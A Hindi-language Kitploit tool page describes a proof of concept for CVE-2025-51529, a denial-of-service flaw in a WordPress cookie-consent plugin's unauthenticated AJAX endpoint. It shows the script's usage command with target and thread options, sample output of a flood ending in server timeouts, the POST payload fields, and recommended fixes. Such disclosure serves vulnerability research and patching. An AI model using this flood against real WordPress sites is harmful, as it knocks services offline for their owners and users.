Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-51529 — jonkastonka Cookies and Content Security Policy प्लगइन (संस्करण 2.29 तक) की AJAX एंडपॉइंट कार्यक्षमता में अनुचित अभिगम नियंत्रण | Kitploit
उपकरण/GitHubGitHub/piotrmaciejbednarski/cve-2025-51529
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubpiotrmaciejbednarski/cve-2025-51529

CVE-2025-51529

jonkastonka Cookies and Content Security Policy प्लगइन (संस्करण 2.29 तक) की AJAX एंडपॉइंट कार्यक्षमता में अनुचित अभिगम नियंत्रण

रिपॉजिटरी देखें
वेबसाइट
61 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-51529: WordPress Cookies and Content Security Policy प्लगइन DoS भेद्यता

jonkastonka Cookies and Content Security Policy प्लगइन में संस्करण 2.29 तक AJAX एंडपॉइंट कार्यक्षमता में अनुचित एक्सेस नियंत्रण, रिमोट हमलावरों को wp_ajax_nopriv_cacsp_insert_consent_data एंडपॉइंट पर असीमित डेटाबेस लेखन कार्यों के माध्यम से सेवा से वंचित (डेटाबेस सर्वर संसाधन थकावट) करने की अनुमति देता है।

यह भेद्यता cacsp_insert_consent_data() फ़ंक्शन में मौजूद है, जो WordPress के AJAX एंडपॉइंट (wp-admin/admin-ajax.php) के माध्यम से प्रमाणीकरण आवश्यकताओं के बिना उजागर होता है। प्लगइन wp_ajax_nopriv_ एक्शन का उपयोग करता है, जिससे यह बिना प्रमाणीकरण वाले उपयोगकर्ताओं के लिए सुलभ हो जाता है।

हमला वेक्टर: रिमोट हमलावर असीमित समवर्ती POST अनुरोध भेजकर डेटाबेस सर्वर को लेखन कार्यों से अभिभूत कर सकते हैं, जिससे CPU और डिस्क I/O थकावट होती है।

भेद्यता विवरण

  • CVE ID: CVE-2025-51529
  • Status: RESERVED
  • Type: अनुचित एक्सेस नियंत्रण / सेवा से वंचित (DoS)
  • Product: Cookies and Content Security Policy प्लगइन संस्करण 2.29 तक
  • Vendor: Johan Jonk Stenstroem (jonkastonka)
  • Affected Function: cacsp_insert_consent_data()
  • Attack Vector: रिमोट
  • Discoverer: Piotr Bednarski
  • आवश्यकताएँ

    • Python 3.x
    • requests
    • matplotlib
    • threading

    उपयोग

    PoC स्क्रिप्ट का मूल उपयोग इस प्रकार है:

    root@kitploit:~
    python payload.py --target <target_url> --threads <number_of_threads>
    

    डिफ़ॉल्ट रूप से, थ्रेड्स की संख्या 100 निर्धारित है। आप इसे दूसरे तर्क के रूप में प्रदान करके थ्रेड्स की एक अलग संख्या निर्दिष्ट कर सकते हैं।

    उदाहरण आउटपुट

    DoS Attack Chart

    root@kitploit:~
    Target WordPress URL (https://example.com): https://vulnerable-site.com
    Number of threads (default 100): 
    
    Launching DoS attack with 100 threads...
    Press Ctrl+C to stop the attack
    
    [19:41:20] ✓ Status: 200 | Response time: 538.3ms | DB: 0.00MB (1 rows, 351b/row)
    [19:41:20] ✓ Status: 200 | Response time: 554.51ms | DB: 0.00MB (2 rows, 351b/row)
    [19:41:20] ✓ Status: 200 | Response time: 522.29ms | DB: 0.00MB (3 rows, 351b/row)
    [19:41:20] ✓ Status: 200 | Response time: 498.72ms | DB: 0.00MB (4 rows, 351b/row)
    [19:41:21] ✓ Status: 200 | Response time: 946.94ms | DB: 0.00MB (5 rows, 351b/row)
    [19:41:21] ✓ Status: 200 | Response time: 858.41ms | DB: 0.00MB (6 rows, 351b/row)
    [19:41:21] ✓ Status: 200 | Response time: 922.29ms | DB: 0.00MB (7 rows, 351b/row)
    [19:41:21] ✓ Status: 200 | Response time: 991.41ms | DB: 0.00MB (8 rows, 351b/row)
    ...
    [19:41:26] ⚠ TIMEOUT - server not responding
    [19:41:26] ⚠ TIMEOUT - server not responding
    [19:41:26] ⚠ TIMEOUT - server not responding
    [19:41:26] ⚠ TIMEOUT - server not responding
    [19:41:26] ⚠ TIMEOUT - server not responding
    

    यह कैसे काम करता है

    एक्सप्लॉइट /wp-admin/admin-ajax.php पर POST अनुरोध भेजता है:

    root@kitploit:~
    data = {
        'action': 'cacsp_insert_consent_data',
        'accepted_cookies': 'necessary,experience,analytics,marketing',
        'expires': "9" * 255  # Maximum TINYTEXT length
    }
    

    प्रत्येक सफल अनुरोध डेटाबेस में एक नई पंक्ति सम्मिलित करता है, जिसमें शामिल है:

    • टाइमस्टैम्प (19 बाइट्स)
    • आईपी पता (~13 बाइट्स)
    • कुकी प्राथमिकताएँ (परिवर्तनशील)
    • समाप्ति डेटा (अधिकतम 255 बाइट्स)
    • साइट आईडी (1 बाइट)
    • MySQL ओवरहेड (~22 बाइट्स)

    परिणाम: ~89 बाइट्स प्रति अनुरोध × असीमित अनुरोध = तीव्र डेटाबेस वृद्धि

    अनुशंसित सुधार

    • AJAX कॉल के लिए nonce सत्यापन जोड़ें
    • प्रति आईपी दर सीमा (rate limiting) लागू करें
    • उपयोगकर्ता इनपुट को उचित रूप से मान्य करें

    अस्वीकरण

    यह PoC केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस कोड के उपयोग से होने वाले किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है। किसी भी सिस्टम पर परीक्षण करने से पहले हमेशा अनुमति प्राप्त करें।

    टूल डाउनलोड करें